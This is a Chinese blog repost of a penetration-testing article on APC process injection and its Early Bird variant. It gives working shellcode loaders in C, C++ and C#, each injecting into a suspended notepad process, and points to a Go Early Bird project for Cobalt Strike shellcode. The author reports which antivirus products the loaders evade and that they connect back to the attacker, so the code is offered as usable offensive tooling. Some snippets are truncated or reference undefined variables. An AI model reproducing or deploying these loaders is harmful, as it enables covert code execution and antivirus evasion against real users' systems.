APC注入以及几种实现方式

最新推荐文章于 2024-05-31 19:34:41 发布
最新推荐文章于 2024-05-31 19:34:41 发布
阅读量2k 收藏 8
点赞数 1
分类专栏: 内网渗透 文章标签: java jvm 算法
原文链接:https://xz.aliyun.com/t/11153
版权

声明
出品|先知社区(ID:林寒)

以下内容,来自先知社区的林寒作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

APC介绍

APC中文名称为异步过程调用, APC是一个链状的数据结构,可以让一个线程在其本应该的执行步骤前执行其他代码,每个线程都维护这一个APC链。当线程从等待状态苏醒后,会自动检测自己得APC队列中是否存在APC过程。

所以只需要将目标进程的线程的APC队列里面添加APC过程,当然为了提高命中率可以向进程的所有线程中添加APC过程。然后促使线程从休眠中恢复就可以实现APC注入。

APC注入的一些前置如下:

  • 线程在进程内执行

  • 线程会调用在APC队列中的函数

  • 应用可以给特定线程的APC队列压入函数(有权限控制)

  • 压入队列后,线程将按照顺序优先级执行(FIFO)

  • 这种注入技术的缺点是只有当线程处在alertable状态时才去执行这些APC函数

MSDN上对此解释如下

图片

QueueUserApc:函数作用:添加制定的异步函数调用(回调函数)到执行的线程的APC队列中

APCproc:函数作用: 回调函数的写法.

首先异步函数调用的原理:

异步过程调用是一种能在特定线程环境中异步执行的系统机制。

往线程APC队列添加APC,系统会产生一个软中断。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC

APC注入

简单原理

1.当对面程序执行到某一个上面的等待函数的时候,系统会产生一个中断

2.当线程唤醒的时候,这个线程会优先去Apc队列中调用回调函数

3.我们利用QueueUserApc,往这个队列中插入一个回调

4.插入回调的时候,把插入的回调地址改为LoadLibrary,插入的参数我们使用VirtualAllocEx申请内存,并且写入进去

注入流程

图片

QueueUserAPC函数的第一个参数表示执行的函数地址,当开始执行该APC的时候,程序就会跳转到该函数地址执行。第二个参数表示插入APC的线程句柄,要求线程句柄必须包含THREAD_SET_CONTEXT访问权限。第三个参数表示传递给执行函数的参数。

与远线程注入类似,如果QueueUserAPC函数的第一个参数,即函数地址设置的是LoadLibraryA函数地址,第三个参数,即传递参数设置的是DLL的路径。

那么,当执行APC的时候,便会调用LoadLibraryA函数加载指定路径的DLL,完成DLL注入操作。如果直接传入shellcode不设置第三个函数,可以直接执行shellcode。

APC注入实现

函数原型

DWORD QueueUserAPC(
  [in] PAPCFUNC  pfnAPC,     //APC 注入方式
  [in] HANDLE    hThread,     
  [in] ULONG_PTR dwData
);

C++ 实现

代码如下

#include <Windows.h>#include <iostream>unsigned char shellcode[] = "<shellcode>";    //shellcode "\xfc\x48\x83\xe4"int main(){
    LPCSTR lpApplication = "C:\\Windows\\System32\\notepad.exe";   //path
    SIZE_T buff = sizeof(shellcode);      //size of shellcode
    STARTUPINFOA sInfo = { 0 };
    PROCESS_INFORMATION pInfo = { 0 };     //return a new process info
    CreateProcessA(lpApplication, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sInfo, &pInfo);      //create a new thread for process
    HANDLE hProc = pInfo.hProcess;
    HANDLE hThread = pInfo.hThread;    
    // write shellcode to the process memory
    LPVOID lpvShellAddress = VirtualAllocEx(hProc, NULL, buff, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    PTHREAD_START_ROUTINE ptApcRoutine = (PTHREAD_START_ROUTINE)lpvShellAddress;
    WriteProcessMemory(hProc, lpvShellAddress, shellcode, buff, NULL)
    // use QueueUserAPC  load shellcode
    QueueUserAPC((PAPCFUNC)ptApcRoutine, hThread, NULL);
    ResumeThread(hThread);
    return 0;}

图片

C#实现

代码如下

using System;using System.Runtime.InteropServices; 
public class shellcode { [DllImport("Kernel32", SetLastError = true, CharSet = CharSet.Unicode)] 
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
 [DllImport("Kernel32", SetLastError = true, CharSet = CharSet.Unicode)] 
 public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("Kernel32", SetLastError = true, CharSet = CharSet.Unicode)] 
 public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [MarshalAs(UnmanagedType.AsAny)] object lpBuffer, uint nSize, ref uint lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] 
 public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern uint ResumeThread(IntPtr hThread); [DllImport("Kernel32", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CloseHandle(IntPtr hObject); [DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)] public static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation); public enum ProcessAccessRights { All = 0x001F0FFF, Terminate = 0x00000001, CreateThread = 0x00000002, VirtualMemoryOperation = 0x00000008, VirtualMemoryRead = 0x00000010, VirtualMemoryWrite = 0x00000020, DuplicateHandle = 0x00000040, CreateProcess = 0x000000080, SetQuota = 0x00000100, SetInformation = 0x00000200, QueryInformation = 0x00000400, QueryLimitedInformation = 0x00001000, Synchronize = 0x00100000 } public enum ThreadAccess : int { TERMINATE = (0x0001), SUSPEND_RESUME = (0x0002), GET_CONTEXT = (0x0008), SET_CONTEXT = (0x0010), SET_INFORMATION = (0x0020), QUERY_INFORMATION = (0x0040), SET_THREAD_TOKEN = (0x0080), IMPERSONATE = (0x0100), DIRECT_IMPERSONATION = (0x0200), THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT, THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION } public enum MemAllocation { MEM_COMMIT = 0x00001000, MEM_RESERVE = 0x00002000, MEM_RESET = 0x00080000, MEM_RESET_UNDO = 0x1000000, SecCommit = 0x08000000 } public enum MemProtect { PAGE_EXECUTE = 0x10, PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40, PAGE_EXECUTE_WRITECOPY = 0x80, PAGE_NOACCESS = 0x01, PAGE_READONLY = 0x02, PAGE_READWRITE = 0x04, PAGE_WRITECOPY = 0x08, PAGE_TARGETS_INVALID = 0x40000000, PAGE_TARGETS_NO_UPDATE = 0x40000000, } [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } [StructLayout(LayoutKind.Sequential)] internal struct PROCESS_BASIC_INFORMATION { public IntPtr Reserved1; public IntPtr PebAddress; public IntPtr Reserved2; public IntPtr Reserved3; public IntPtr UniquePid; public IntPtr MoreReserved; } [StructLayout(LayoutKind.Sequential)] //internal struct STARTUPINFO public struct STARTUPINFO { uint cb; IntPtr lpReserved; IntPtr lpDesktop; IntPtr lpTitle; uint dwX; uint dwY; uint dwXSize; uint dwYSize; uint dwXCountChars; uint dwYCountChars; uint dwFillAttributes; public uint dwFlags; public ushort wShowWindow; ushort cbReserved; IntPtr lpReserved2; IntPtr hStdInput; IntPtr hStdOutput; IntPtr hStdErr; } public static PROCESS_INFORMATION StartProcess(string binaryPath) { uint flags = 0x00000004; STARTUPINFO startInfo = new STARTUPINFO(); PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION(); CreateProcess((IntPtr)0, binaryPath, (IntPtr)0, (IntPtr)0, false, flags, (IntPtr)0, (IntPtr)0, ref startInfo, out procInfo); return procInfo; } public TestClass() { string b64 = ""; //shellcode base64 encode string targetprocess = "C:/Windows/System32/notepad.exe"; byte[] shellcode = new byte[] { }; shellcode = Convert.FromBase64String(b64); uint lpNumberOfBytesWritten = 0; PROCESS_INFORMATION processInfo = StartProcess(targetprocess); IntPtr pHandle = OpenProcess((uint)ProcessAccessRights.All, false, (uint)processInfo.dwProcessId); //write shellcode to the process memory IntPtr rMemAddress = VirtualAllocEx(pHandle, IntPtr.Zero, (uint)shellcode.Length, (uint)MemAllocation.MEM_RESERVE | (uint)MemAllocation.MEM_COMMIT, (uint)MemProtect.PAGE_EXECUTE_READWRITE); if (WriteProcessMemory(pHandle, rMemAddress, shellcode, (uint)shellcode.Length, ref lpNumberOfBytesWritten)) { IntPtr tHandle = OpenThread(ThreadAccess.THREAD_ALL, false, (uint)processInfo.dwThreadId); IntPtr ptr = QueueUserAPC(rMemAddress, tHandle, IntPtr.Zero); ResumeThread(tHandle); } bool hOpenProcessClose = CloseHandle(pHandle); } }

这里测试过了火绒但是没过360

C实现

代码如下

#include <windows.h>#include <stdio.h>unsigned char shellcode[] = <shellcode>;   //shellcode   {0xfc,0x48,0x83}unsigned int buff = sizeof(shellcode);int main(void) {
 STARTUPINFO si;
 PROCESS_INFORMATION pi;
 void * ptApcRoutine;
 ZeroMemory(&si, sizeof(si));
 si.cb = sizeof(si);
 ZeroMemory(&pi, sizeof(pi)); CreateProcessA(0, "notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
 ptApcRoutine = VirtualAllocEx(pi.hProcess, NULL, buff, MEM_COMMIT, PAGE_EXECUTE_READ);
 WriteProcessMemory(pi.hProcess, ptApcRoutine, (PVOID) shellcode, (SIZE_T) buff, (SIZE_T *) NULL);
 QueueUserAPC((PAPCFUNC)ptApcRoutine, pi.hThread, NULL);
 ResumeThread(pi.hThread);
 return 0;
}

这里被360杀了,但是加载是能上线的。

APC注入变种Early bird

Early Bird是一种简单而强大的技术,Early Bird本质上是一种APC注入与线程劫持的变体,由于线程初始化时会调用ntdll未导出函数NtTestAlert,NtTestAlert是一个检查当前线程的 APC 队列的函数,如果有任何排队作业,它会清空队列。当线程启动时,NtTestAlert会在执行任何操作之前被调用。因此,如果在线程的开始状态下对APC进行操作,就可以完美的执行shellcode。(如果要将shellcode注入本地进程,则可以APC到当前线程并调用NtTestAlert函数来执行)

通常使用的 Windows 函数包括:

  • CreateProcessA:此函数用于创建新进程及其主线程。

  • VirtualAllocEx:在指定进程的虚拟空间保留或提交内存区域

  • WriteProcessMemory:将数据写入指定进程的内存区域。

  • QueueUserAPC:允许将 APC 对象添加到指定线程的 APC 队列中。

Early bird注入流程

1.创建一个挂起的进程(通常是windows的合法进程)

2.在挂起的进程内申请一块可读可写可执行的内存空间

3.往申请的空间内写入shellcode

4.将APC插入到该进程的主线程

5.恢复挂起进程的线程

图片

Early bird注入实现

C实现

代码如下

#include <Windows.h>int main() {
 unsigned char shellcode[] = "<shellcode>"; //shellcode  "\xfc\x48\x83\xe4"
 SIZE_T shellSz = sizeof(buff);
 STARTUPINFOA st = { 0 };
 PROCESS_INFORMATION prt = { 0 };
 CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &prt);
 HANDLE victimProcess = prt.hProcess;
 HANDLE threadHandle = prt.hThread;
 LPVOID shellAddr = VirtualAllocEx(victimProcess, NULL, shellSz, MEM_COMMIT,

图片

C++实现

代码如下

#include <Windows.h>int main(){
    unsigned char shellcode[] = "<shellcode>";    //"\xfc\x48\x83\xe4"
    SIZE_T shellSize = sizeof(buf);
    STARTUPINFOA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
    HANDLE victimProcess = pi.hProcess;
    HANDLE threadHandle = pi.hThread;
    LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
    WriteProcessMemory(victimProcess, shellAddress, buf, shellSize, NULL);
    QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
    ResumeThread(threadHandle);
    return 0;}

图片

Go实现

参考项目:

https://github.com/Ne0nd0g/go-shellcode/blob/master/cmd/EarlyBird
将其中的shellcode替换成CS的shellcode即可
图片
编译之后运行上线
图片

参考

  • https://docs.microsoft.com/zhcn/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc?redirectedfrom=MSD

  • http://subt0x10.blogspot.com/2017/01/shellcode-injection-via-queueuserapc.html

  • https://www.cnblogs.com/iBinary/p/7574055.html

  • https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection

  • https://idiotc4t.com/code-and-dll-process-injection/early-bird

长白山攻防实验室
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于dll注入方式的学习(APC注入
2201_75856701的博客
03-02 805
QueueUserAPC 函数的第一个参数表示执行函数的地址,当开始执行该APC的时候,程序会跳转到该函数地址处来执行。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC。这里介绍一下应用程序的APCAPC是往线程中插入一个回调函数,但是用的APC调用这个回调函数是有条件的,如msdn所示。当处于用户模式的APC被压入到线程APC队列后,线程并不会立刻执行压入的APC函数,而是要等到线程处于。
注入技术之APC注入
whs100505的博客
02-10 719
APC注入 原理:每个线程都有一个APC队列,当调用SleepEx,SignalObjectAndWait,WaitForSingleObjectEx,WaitForMultipleObjectsEx或MsgWaitForMultipleObjectsEx进入警报状态时,系统会遍历该线程的APC,按照先进先出的顺序执行APC。 #include <Windows.h> bool AP...
Windows内核Dll注入(一)
最新发布
xsinlink的博客
05-31 813
近期在云桌面中遇到许多情况都需要对应用层程序的函数进行HOOK,并需要对函数参数进行各种修改,以便能够在虚拟桌面里面支持一些特性(尤其是一些3D的场景)。因此这里最主要的就是需要对HOOK的进程进行注入,来实现HOOK函数的功能。在早期开发中,就实现过DLL注入的功能,不过都是基于用户层的注入实现的,例如有远线程注入,消息钩子注入,用户层OPE注入。HOOK注入的第一步是需要找到一个函数,这个函数可以确保所有的进程启动的时候都会被调用,这个函数就是。下面的文章主要是针对HOOK函数的注入,这个函数是。
APC_dll注入
qq_36918532的博客
03-03 435
主要是以下五步 //注入器 //1.要注入到进程中首先要拿到进程ID //2.获取到LoadLibrary地址 //3.在目标程序的体内开辟一块内存,用来写入dll地址 //4.遍历线程-随便选一个目标进程的线程获取句柄 //5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数 #include<stdio.h> #include<stdlib.h> #include<Windows.h> #include<TlHelp3
注入系列:APC注入(Ring3)
weixin_43742894的博客
03-22 888
APC注入的作用:APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码。 要了解APC注入,我们首先来了解Windows的APC机制。 APC机制详细可参考本文:https://blog.csdn.net/qq229596421/article/details/77828647 简单来说,APC 是一个简称,具体名字叫做异步过程调用。是软件中断的一种。 APC队列:每个线程都有...
编程实现APC注入dll到进程
yeanhoo的博客
09-23 326
APC注入 线程被唤醒时APC中的注册函数会被执行,因此使用QueueUserAPCAPC队列插入函数即可完成注入 #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> BOOL ApcInject(char *,char *); DWORD GetProcessIdByProcessName(char *); BOOL GetAllThreadIdByProcessId(DWORD,PDWORD,P
APC 基本概念及APC注入实现(Ring3 + Ring0)----实现
商少
07-21 2787
APC 基本概念及APC注入实现(Ring3 + Ring0)—-实现Ring3 原理        利用QueueUserAPC 函数把APC添加到指定可警告线程的APC队列。 其中QueueUserAPC 函数及APC函数声明如下: DWORD WINAPI QueueUserAPC( _In_ PAPCFUNC pfnAPC, _In_ HANDLE
C++ APC注入.zip
08-06
C++ APC注入是一种高级的进程通信技术,常用于在Windows操作系统中实现远程线程注入。在本案例中,APC(Asynchronous Procedure Call)注入被用作替代方法,因为直接的DLL注入可能导致某些系统,如Win7,在特定情况...
易语言移植的APC注入源码
06-06
在易语言中实现APC注入,开发者需要理解和转换Windows API到易语言的调用方式,这包括如何定义数据类型、如何调用系统函数等。例如,易语言可能没有直接对应`OpenProcess`的内置命令,需要使用“调用外部函数”或者...
易语言移植的APC注入
07-22
在易语言中,APC注入实现步骤可能包括以下几个关键部分: 1. **创建DLL**:首先,你需要编写一个动态链接库(DLL),其中包含一个将被注入到目标线程的函数。 2. **加载DLL**:找到目标进程,并使用`OpenProcess...
移植的APC注入
02-05
【移植的APC注入】是一种在Windows操作系统中实现线程上下文切换时执行代码的技术,主要涉及系统级编程和安全领域。APC(Asynchronous Procedure Call)是Windows API提供的一种异步过程调用机制,允许在不同的线程...
Kernel_Inject:内核注入DLL
02-15
别问问就是F7 修仙交流(限定筑基期至渡劫期):546110133
精选_APC注入_源码打包
03-10
2. **APC注入实现方式**:介绍如何利用`QueueUserAPC`等API进行APC注入,包括权限获取、内存分配、shellcode构造等步骤。 3. **安全漏洞与利用**:分析可能导致APC注入的系统或应用程序漏洞,以及如何利用这些...
APC注入
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
10-30 616
/*********************************** desc : This code was written for inject a dll named text.dll to the target process based on APC. time : 2013 coder: ejoywx **********************
APC实现DLL注入
十年磨一剑,霜刃未曾试!
01-19 2545
#include #include int InjectDllWithApc(char DllFullPath[MAX_PATH], ULONG pid ) { HANDLE hProcess,hThread,hThreadSnap = INVALID_HANDLE_VALUE; THREADENTRY32 te32 = {0} ; HMODULE hDll = GetM
4.内核APC执行过程
My classmates
10-24 1776
APC函数的执行与插入并不是同一个线程: 在A线程中向B线程插入一个APC,插入的动作是在A线程中完成的,但什么时候执行则由B线程决定!,所以叫“异步过程调用&amp;quot; 内核APC函数与用户APC函数的执行时间和执行方式也有区别,我们本节课主要学习内核APC的执行过程。 执行点1:线程切换 SwapContext //判断是否有内核APC KiSwapThread KiDelicerApc /...
插入apc方式 实现dll注入
blackbean的专栏
06-20 833
测试了一下 插入Explorer是可以的    但是不保证插入每一个进程都会成功。 BOOL UseApcInsertDll(DWORD dwProcessID, char *strDllName) { //打开进程 HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID); if (hProcess ==
一、C++反作弊对抗实战 (基础篇 —— 3.利用APC注入DLL)
Koma的主页
03-02 658
APC(Asynchronous Procedure Call),简称“异步过程调用”,是在一个特定线程环境下被异步执行的函数,分为用户模式(user mode)和内核模式(kernel mode)。
windows APC注入代码实现
05-21
APC(Asynchronous Procedure Call)指异步过程调用,是Windows操作系统中的一种机制。通过APC注入,可以在目标进程中执行指定的函数或代码。 以下是一个简单的APC注入代码示例: ```c++ #include <windows.h> #include <tlhelp32.h> void apcFunc(ULONG_PTR dwParam) { MessageBoxA(NULL, "APC Injection Successful!", "Success", MB_OK); } int main() { // 获取目标进程ID DWORD pid = 0; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(snapshot, &pe32)) { do { if (strcmp(pe32.szExeFile, "target.exe") == 0) { pid = pe32.th32ProcessID; break; } } while (Process32Next(snapshot, &pe32)); } CloseHandle(snapshot); if (pid == 0) { MessageBoxA(NULL, "Target process not found!", "Error", MB_ICONERROR); return 0; } // 打开目标进程 HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (hProcess == NULL) { MessageBoxA(NULL, "Failed to open target process!", "Error", MB_ICONERROR); return 0; } // 在目标进程中分配一块内存 LPVOID pRemoteFunc = VirtualAllocEx(hProcess, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (pRemoteFunc == NULL) { MessageBoxA(NULL, "Failed to allocate memory in target process!", "Error", MB_ICONERROR); CloseHandle(hProcess); return 0; } // 在当前进程中写入要注入的代码 BYTE code[] = {0x68, 0x00, 0x00, 0x00, 0x00, // push dwParam 0x68, 0x00, 0x00, 0x00, 0x00, // push apcFunc 0xC3}; // ret *(ULONG_PTR *)(code + 1) = (ULONG_PTR)pRemoteFunc + 1024 - 4; *(ULONG_PTR *)(code + 6) = (ULONG_PTR)apcFunc; SIZE_T bytesWritten = 0; if (!WriteProcessMemory(hProcess, pRemoteFunc, code, sizeof(code), &bytesWritten) || bytesWritten != sizeof(code)) { MessageBoxA(NULL, "Failed to write code to target process!", "Error", MB_ICONERROR); VirtualFreeEx(hProcess, pRemoteFunc, 0, MEM_RELEASE); CloseHandle(hProcess); return 0; } // 获取目标进程中kernel32.dll中的LoadLibraryA函数地址 HMODULE hMod = GetModuleHandleA("kernel32.dll"); FARPROC pfnLoadLibraryA = GetProcAddress(hMod, "LoadLibraryA"); if (pfnLoadLibraryA == NULL) { MessageBoxA(NULL, "Failed to get LoadLibraryA address!", "Error", MB_ICONERROR); VirtualFreeEx(hProcess, pRemoteFunc, 0, MEM_RELEASE); CloseHandle(hProcess); return 0; } // 将LoadLibraryA函数地址作为回调函数注入到目标进程中 HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteFunc, 0, NULL); if (hThread == NULL) { MessageBoxA(NULL, "Failed to create remote thread in target process!", "Error", MB_ICONERROR); VirtualFreeEx(hProcess, pRemoteFunc, 0, MEM_RELEASE); CloseHandle(hProcess); return 0; } // 等待注入完成 WaitForSingleObject(hThread, INFINITE); // 清理资源 VirtualFreeEx(hProcess, pRemoteFunc, 0, MEM_RELEASE); CloseHandle(hThread); CloseHandle(hProcess); return 0; } ``` 上述代码会在目标进程中注入一个APC,当APC被激活时,会在目标进程中执行一个MessageBoxA函数,弹出一个消息框。在实际使用中,可以将apcFunc替换为要执行的代码的地址,实现对目标进程的控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值